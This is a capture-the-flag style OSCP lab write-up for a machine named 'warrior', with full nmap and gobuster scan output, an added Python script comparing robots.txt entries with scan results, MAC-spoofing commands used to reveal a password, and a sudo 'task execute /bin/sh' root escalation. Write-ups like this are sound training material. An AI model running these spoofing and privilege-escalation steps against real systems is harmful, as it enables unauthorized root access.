OSCP Lab
Lab overview
warrior | easy | Information gathering, MAC address change, privilege escalation via task |
Information gathering
Host discovery
Port scanning
└─# nmap -sV -A -p- -T4 192.168.31.70
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-15 03:13 EST
Nmap scan report for 192.168.31.70
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 25:16:8d:63:6b:75:f0:59:55:d4:b0:2d:75:8d:e0:e6 (RSA)
| 256 1e:29:d0:f4:c5:95:e7:40:30:2b:35:f7:a3:bc:36:75 (ECDSA)
|_ 256 cc:b1:52:b3:d7:ef:cd:73:4c:fc:f6:b5:51:77:ea:f3 (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 7 disallowed entries
| /admin /secret.txt /uploads/id_rsa /internal.php
|_/internal /cms /user.txt
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
MAC Address: 08:00:27:0C:35:AB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory scanning
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.70 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.70
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.70/index.html (Status: 200) [Size: 31]
http://192.168.31.70/user.txt (Status: 200) [Size: 5]
http://192.168.31.70/admin (Status: 301) [Size: 169] [--> http://192.168.31.70/admin/]
http://192.168.31.70/robots.txt (Status: 200) [Size: 137]
http://192.168.31.70/internal.php (Status: 200) [Size: 82]
http://192.168.31.70/secret.txt (Status: 200) [Size: 17]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
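The two scans above show that robots.txt is not an access control: several of the paths it disallows are served with status 200. The following check is an added example, not part of the original write-up; it cross-references the nmap http-robots.txt output with the gobuster results copied from this page, and the function names are illustrative.

```python
import re
from urllib.parse import urlparse

# Excerpts copied from the nmap and gobuster output on this page.
NMAP_ROBOTS = """\
| http-robots.txt: 7 disallowed entries
| /admin /secret.txt /uploads/id_rsa /internal.php
|_/internal /cms /user.txt
"""
GOBUSTER = """\
http://192.168.31.70/index.html (Status: 200) [Size: 31]
http://192.168.31.70/user.txt (Status: 200) [Size: 5]
http://192.168.31.70/admin (Status: 301) [Size: 169] [--> http://192.168.31.70/admin/]
http://192.168.31.70/robots.txt (Status: 200) [Size: 137]
http://192.168.31.70/internal.php (Status: 200) [Size: 82]
http://192.168.31.70/secret.txt (Status: 200) [Size: 17]
"""

def disallowed_paths(nmap_text):
    """Extract the disallowed paths from nmap's http-robots.txt script output."""
    paths = []
    for line in nmap_text.splitlines():
        paths += [tok for tok in line.lstrip("|_ ").split() if tok.startswith("/")]
    return paths

def status_by_path(gobuster_text):
    """Map URL path -> HTTP status from gobuster 'dir' result lines."""
    pattern = re.compile(r"^(https?://\S+)\s+\(Status: (\d{3})\)", re.M)
    return {urlparse(u).path: int(s) for u, s in pattern.findall(gobuster_text)}

def audit(nmap_text, gobuster_text):
    """Classify each robots.txt entry by how the server answered for it."""
    seen = status_by_path(gobuster_text)
    report = {"served": [], "redirect": [], "not_observed": []}
    for path in disallowed_paths(nmap_text):
        code = seen.get(path)
        if code == 200:
            report["served"].append(path)        # readable by anyone
        elif code in (301, 302):
            report["redirect"].append(path)      # exists, check the target
        else:
            report["not_observed"].append(path)  # not hit by this wordlist
    return report

if __name__ == "__main__":
    for bucket, paths in audit(NMAP_ROBOTS, GOBUSTER).items():
        print(f"{bucket}: {', '.join(paths) or '-'}")
```

Entries in the not_observed bucket were simply not reached by the wordlist scan, so they still need to be checked directly on the server.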
There is a hint here: the password only becomes visible after changing the MAC address.
sudo ifconfig eth1 down
sudo ifconfig eth1 hw ether 00:00:00:00:00:af
sudo ifconfig eth1 up
sudo service networking restart
ifconfig
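After the change, visiting the page again returns the password.
Gaining access
Log in with the bro account given in the hint.
Privilege escalation
Use task, run through sudo, to escalate to root privileges: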
/usr/sbin/sudo /usr/bin/task execute /bin/sh
End
Originally published on the WeChat official account 贝雷帽SEC: 【OSCP】warrior